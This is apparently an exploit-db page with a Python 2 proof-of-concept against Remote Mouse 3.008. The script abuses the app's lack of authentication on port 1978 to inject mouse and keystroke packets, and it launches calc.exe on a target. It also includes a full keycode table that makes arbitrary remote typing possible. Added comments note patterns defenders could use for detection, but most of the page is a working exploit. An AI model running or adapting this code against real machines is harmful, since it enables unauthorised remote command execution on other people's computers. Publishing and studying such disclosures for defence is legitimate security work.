RemoteMouse 3.008 – Arbitrary Remote Command Execution

  • 作者: 0rphon
    日期: 2019-04-15
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/46697/
  • # Exploit Title: Remote Mouse 3.008 - Failure to Authenticate
    # Date: 2019-09-04
    # Exploit Author: 0rphon
    # Software Link: https://www.remotemouse.net/
    # Version: 3.008
    # Tested on: Windows 10
    
    #Remote Mouse 3.008 fails to check for authentication and will execute any command that any machine sends it
    #This script pops calc as proof of concept (albeit a bit slowly)
    #It also has an index of the keycodes the app uses to communicate with the computer if you want to mess around with it yourself
    
    
    #!/usr/bin/python2
    from socket import socket, AF_INET, SOCK_STREAM, SOCK_DGRAM
    from time import sleep
    from sys import argv
    
    def Ping(ip):
        """Check whether `ip` answers on TCP port 1978 with the expected banner.

        Opens a TCP connection with a 5-second timeout, reads one response
        without sending anything first, and compares it to a fixed string.
        Returns True on an exact match and False on any other response.
        If any step raises, an error is printed and None is returned.

        Defender note: the service hands this banner to any client that
        connects, with no credentials exchanged, so the same comparison is
        usable for asset inventory of hosts exposing the listener.
        """
        expected_banner = "SIN 15win nop nop 300"
        try:
            probe = socket(AF_INET, SOCK_STREAM)
            probe.settimeout(5)
            probe.connect((ip, 1978))
            banner = probe.recv(1048)
            probe.close()
            return banner == expected_banner
        except:
            # Bare except kept as published: every failure (refused, timeout,
            # bad address) is reported as a timeout and the result is None.
            # The socket is not closed on this path.
            print("ERROR: Request timed out")
    
    
    
    def MoveMouse(x,y,ip):
        """Send relative pointer-movement datagrams to UDP port 1978 on `ip`.

        The sign of `x` and of `y` selects which payload string is used and
        the magnitude is the number of datagrams sent, so a move of N units
        produces N packets. A zero component sends nothing. Returns None.

        Defender note: a long burst of tiny cleartext UDP datagrams starting
        with "mos" to port 1978 from a single source is what this produces
        on the wire, which makes it a practical network-detection pattern.
        """
        def SendMouse(command,times,ip):
            # One new UDP socket and one datagram per step, 1 ms apart.
            for _ in range(times):
                channel = socket(AF_INET, SOCK_DGRAM)
                channel.sendto(command,(ip,1978))
                sleep(0.001)

        # Payload strings are reproduced exactly as published.
        if x > 0:
            SendMouse("mos5m 1 0", x, ip)
        elif x < 0:
            SendMouse("mos5m -1 0", x * -1, ip)

        if y > 0:
            SendMouse("mos5m 0 1", y, ip)
        elif y < 0:
            SendMouse("mos6m 0 -1", y * -1, ip)
    
    
    
    def MousePress(command,ip,action="click"):
        """Send a mouse-button event for `command` to UDP port 1978 on `ip`.

        `action` is "down", "up" or "click"; "click" sends the down payload
        followed by the up payload on the same socket. Any other value raises
        Exception before a socket is created. Returns None.
        """
        if action == "down":
            suffixes = (" d",)
        elif action == "up":
            suffixes = (" u",)
        elif action == "click":
            suffixes = (" d", " u")
        else:
            raise Exception('MousePress: No action named "'+str(action)+'"')

        channel = socket(AF_INET, SOCK_DGRAM)
        for suffix in suffixes:
            channel.sendto((command + suffix), (ip, 1978))
    
    
    def SendString(string,ip):
        """Send `string` to UDP port 1978 on `ip`, one datagram per character.

        Each character is translated through the module-level `characters`
        table; a character missing from that table raises KeyError. A new
        socket is created per character and the function pauses 0.5 s after
        each send. An empty string sends nothing. Returns None.
        """
        for symbol in string:
            channel = socket(AF_INET, SOCK_DGRAM)
            payload = characters[symbol]
            channel.sendto(payload, (ip, 1978))
            sleep(0.5)
    
    
    
    
    class mouse:
        # Payload prefixes for the three mouse buttons. MousePress appends
        # " d" (action "down") or " u" (action "up") before sending.
        leftClick = "mos5R l"
        rightClick = "mos5R r"
        middleClick = "mos5R m"
    
    # Lookup table: printable character -> the datagram payload that SendString
    # sends for that character. Every entry has the form "key" + one digit +
    # remainder; in each entry here the digit equals the character count of the
    # remainder ("[ras]" plus a numeric code, or a named key: RTN for "\n",
    # BAS for "\b"). The numeric codes themselves are opaque from this file.
    # Defender note: payloads are sent as-is, so the literal "key" / "[ras]"
    # prefixes in cleartext UDP traffic to port 1978 are usable as a
    # network-detection string.
    characters={
    "A":"key8[ras]116", "B":"key8[ras]119", "C":"key8[ras]118", "D":"key8[ras]113", "E":"key8[ras]112", 
    "F":"key8[ras]115", "G":"key8[ras]114", "H":"key8[ras]125", "I":"key8[ras]124", "J":"key8[ras]127", 
    "K":"key8[ras]126", "L":"key8[ras]121", "M":"key8[ras]120", "N":"key8[ras]123", "O":"key8[ras]122", 
    "P":"key8[ras]101", "Q":"key8[ras]100", "R":"key8[ras]103", "S":"key8[ras]102", "T":"key7[ras]97", 
    "U":"key7[ras]96", "V":"key7[ras]99", "W":"key7[ras]98", "X":"key8[ras]109", "Y":"key8[ras]108", 
    "Z":"key8[ras]111",
    
    "a":"key7[ras]84", "b":"key7[ras]87", "c":"key7[ras]86", "d":"key7[ras]81", "e":"key7[ras]80", 
    "f":"key7[ras]83", "g":"key7[ras]82", "h":"key7[ras]93", "i":"key7[ras]92", "j":"key7[ras]95", 
    "k":"key7[ras]94", "l":"key7[ras]89", "m":"key7[ras]88", "n":"key7[ras]91", "o":"key7[ras]90", 
    "p":"key7[ras]69", "q":"key7[ras]68", "r":"key7[ras]71", "s":"key7[ras]70", "t":"key7[ras]65", 
    "u":"key7[ras]64", "v":"key7[ras]67", "w":"key7[ras]66", "x":"key7[ras]77", "y":"key7[ras]76", 
    "z":"key7[ras]79",
    
    "1":"key6[ras]4", "2":"key6[ras]7", "3":"key6[ras]6", "4":"key6[ras]1", "5":"key6[ras]0",
    "6":"key6[ras]3", "7":"key6[ras]2", "8":"key7[ras]13", "9":"key7[ras]12", "0":"key6[ras]5",
    
    "\n":"key3RTN", "\b":"key3BAS", " ":"key7[ras]21",
    
    "+":"key7[ras]30", "=":"key6[ras]8", "/":"key7[ras]26", "_":"key8[ras]106", "<":"key6[ras]9", 
    ">":"key7[ras]11", "[":"key8[ras]110", "]":"key8[ras]104", "!":"key7[ras]20", "@":"key8[ras]117", 
    "#":"key7[ras]22", "$":"key7[ras]17", "%":"key7[ras]16", "^":"key8[ras]107", "&":"key7[ras]19", 
    "*":"key7[ras]31", "(":"key7[ras]29", ")":"key7[ras]28", "-":"key7[ras]24", "'":"key7[ras]18", 
    '"':"key7[ras]23", ":":"key7[ras]15", ";":"key7[ras]14", "?":"key7[ras]10", "`":"key7[ras]85", 
    "~":"key7[ras]75", "\\":"key8[ras]105", "|":"key7[ras]73", "{":"key7[ras]78", "}":"key7[ras]72",
    ",":"key7[ras]25", ".":"key7[ras]27"
    }
    
    
    def PopCalc(ip):
        """Run the page's proof-of-concept sequence against `ip`.

        Issues a large relative pointer move, a left click, then sends the
        text "calc.exe" followed by a newline, pausing one second before
        each string.

        The success line is printed unconditionally: nothing in this
        function receives a reply or otherwise confirms that anything ran
        on the remote host.
        """
        MoveMouse(-5000,3000,ip)
        MousePress(mouse.leftClick,ip)
        for keystrokes in ("calc.exe", "\n"):
            sleep(1)
            SendString(keystrokes,ip)
        print("SUCCESS! Process calc.exe has run on target",ip)
    
    
    def main():
        """Command-line entry point; expects the address as the first argument.

        Exits with a usage message when no argument is given, and exits with
        an error when Ping() does not return True for the address. Otherwise
        hands the address to PopCalc().
        """
        try:
            target_ip = argv[1]
        except:
            # Bare except kept as published; a missing argv[1] lands here.
            print("ERROR: You forgot to enter an IP! example: exploit.py 10.0.0.1")
            exit()

        # Ping() may return True, False or None; only True proceeds.
        if not (Ping(target_ip) == True):
            print("ERROR: Target machine is not running RemoteMouse")
            exit()
        PopCalc(target_ip)

    if __name__ == "__main__":
        main()